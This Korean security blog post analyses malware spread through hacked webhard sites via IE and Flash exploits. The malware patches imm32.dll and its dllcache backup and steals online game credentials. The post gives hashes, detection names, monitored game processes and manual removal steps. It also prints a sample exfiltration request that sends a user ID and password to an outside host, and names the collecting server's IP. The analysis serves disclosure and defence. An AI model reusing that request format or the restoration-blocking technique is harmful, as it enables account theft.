주말이 지나고 월요일로 넘어온 상태에서도 국내 웹하드 해킹을 통한 온라인 게임 계정 정보를 유출하는 악성코드 유포 행위가 계속적으로 이루어지고 있습니다.

이번 악성코드의 경우에는 정상적인 imm32.dll(Windows XP IMM32 API Client DLL) 시스템 파일을 패치하는 과정에서 기존과 다르게 백업된 imm32.dll 파일까지 감염시켜 복원하는 과정을 어렵게 하고 있는 것이 특징입니다.


파일명 보안 제품 진단명
z.html ALYac 2.0 Exploit.JS.Iframe.J
v.html ALYac 2.0 Exploit.JS.Mult.Swf.L
main.swf ALYac 2.0 Exploit.SWF.ShellCode.Gen
c.html AntiVir HTML/Shellcode.Gen
x.html ALYac 2.0 Exploit.JS.CVE-2010-0806.F

해당 유포 행위에 사용된 취약점은 Internet Explorer 웹 브라우저에서 발견된 CVE-2010-0806 취약점과 Adobe Flash Player 취약점인 CVE-2011-2110가 이용되고 있으므로, 보안 패치가 이루어지지 않은 사용자는 해킹된 웹하드 사이트 접속시 자동으로 감염될 수 있습니다.

최종적으로 다운로드된 실행 파일(MD5 : 9535651f0628e97550f2132e4a8ff14e)은 마이크로소프트(Microsoft)사에서 제작한 파일로 위장하고 있으며, 안철수연구소(AhnLab) V3 보안 제품에서 Dropper/Win32.OnlineGameHack (VirusTotal : 3/44) 진단명으로 차단하고 있습니다.


[생성(변경) 파일 및 진단 정보]

C:\WINDOWS\system32\dllcache\imm32.dll :: 변경 전 파일 크기 : 110,080 Bytes / 변경 후 파일 크기 : 111,104 Bytes
 - MD5 : 8a5f391387a3293d21b295ed5b917220
 - AntiVir : TR/Patched.Gen2 (VirusTotal : 5/44)

C:\WINDOWS\system32\imD42.dll :: imm32.dll 백업 파일(정상 파일)

C:\WINDOWS\system32\imm32.dll  :: 변경 전 파일 크기 : 110,080 Bytes / 변경 후 파일 크기 : 111,104 Bytes
 - MD5 : 8a5f391387a3293d21b295ed5b917220
 - AntiVir : TR/Patched.Gen2 (VirusTotal : 5/44)

C:\WINDOWS\system32\ws2sock.dll
 - MD5 : E5BC558B70FCC4C19A8D633E9E897AE8
 - AntiVir : TR/ATRAPS.Gen

해당 악성코드 감염시 기존에는 시스템 폴더(C:\WINDOWS\system32)에 위치한 imm32.dll 시스템 파일만을 패치하였지만, 이번의 경우에는 imm32.dll 파일 복원에 필요한 [C:\WINDOWS\system32\dllcache\imm32.dll] 파일을 함께 패치하여 복원을 어렵게 하고 있습니다.

imm32.dll 정상 시스템 파일은 imD42.dll 파일로 백업을 하여 시스템 시작시 악성 imm32.dll 파일이 이용하고 있는 것을 확인할 수 있습니다.

이번 악성코드의 핵심 파일인 온라인 게임 정보 수집 및 유출을 담당하는 ws2sock.dll 파일은 파일 크기가 17.4MB로 비정상적인 크기를 가지고 있습니다.

ws2sock.dll 파일은 다음과 같은 iexplore.exe, dnf.exe, MapleStory.exe, lin.bin, ff2client.exe, Game.exe, heroes.exe, Launcher.exe, TERA.exe, PCOTP.exe, AION.bin 프로세스들을 감시하여 개인정보 수집 및 외부 유출을 담당하고 있습니다.


[한게임 테라(Tera) 계정 정보 수집 예시]

GET /HG/include/kernel/AddAccount.php?A1=(사용자 ID)&F1=(비밀번호)&S1=&O2=&S3=~(생략)~=0&P1=1.1&F2=hg HTTP/1.1
User-Agent: IE6.0
Host: hananxxin.com


수집된 계정 정보는 대만(TW)에 위치한 60.199.114.19 서버로 전송이 이루어지고 있는 것을 확인할 수 있습니다.

해당 악성코드 감염으로 인한 치료시 보안 제품을 이용한 방법으로 해결이 되지 않는 경우에는 다음의 절차에 따라 수동으로 해결하시기 바랍니다.(※ 반드시 모든 프로그램을 종료한 상태에서 진행하시기 바랍니다.)

참고로 수동으로 문제 해결을 할 경우에는 반드시 폴더 옵션에서 [보호된 운영 체제 파일 숨기기] 항목에 대하여 체크 해제 및 [숨김 파일 및 폴더 표시] 항목으로 변경을 하시기 바랍니다.

1. C:\WINDOWS\system32\dllcache\imm32.dll 파일을 imm32.dll- 형태로 확장자명을 변경합니다.

2. C:\WINDOWS\system32\imD42.dll 파일을 C:\WINDOWS\system32\dllcache 폴더에 복사합니다.

3. 복사된 C:\WINDOWS\system32\dllcache\imD42.dll 파일을 imm32.dll 파일로 이름을 변경합니다.

4. C:\WINDOWS\system32\imm32.dll 파일을 imm32.dll- 형태로 확장자명을 변경합니다.

악성 imm32.dll 파일을 imm32.dll- 형태로 확장자명을 변경한 경우, 일정 시간이 지나면 윈도우 파일 보호(WFP) 기능을 통해 정상적인 imm32.dll 파일이 복원되는 것을 확인할 수 있습니다.

5. 반드시 시스템 재부팅을 진행합니다.

6. 다음의 파일을 수동으로 삭제합니다.

  • C:\WINDOWS\system32\dllcache\imm32.dll-
  • C:\WINDOWS\system32\imD42.dll
  • C:\WINDOWS\system32\imm32.dll-

위와 같은 방법으로 문제를 해결한 사용자는 반드시 국내외 유명 보안 제품을 이용하여 정밀 검사를 추가적으로 진행하시기 바랍니다.

또한 감염된 사용자는 보안 패치가 이루어지지 않은 것을 의미하므로 반드시 Windows 보안 패치 및 최신 Adobe Flash Player 버전으로 업데이트를 하시기 바랍니다.

블로그 이미지

울지않는 벌새

울지않는벌새가 되고 싶은 나..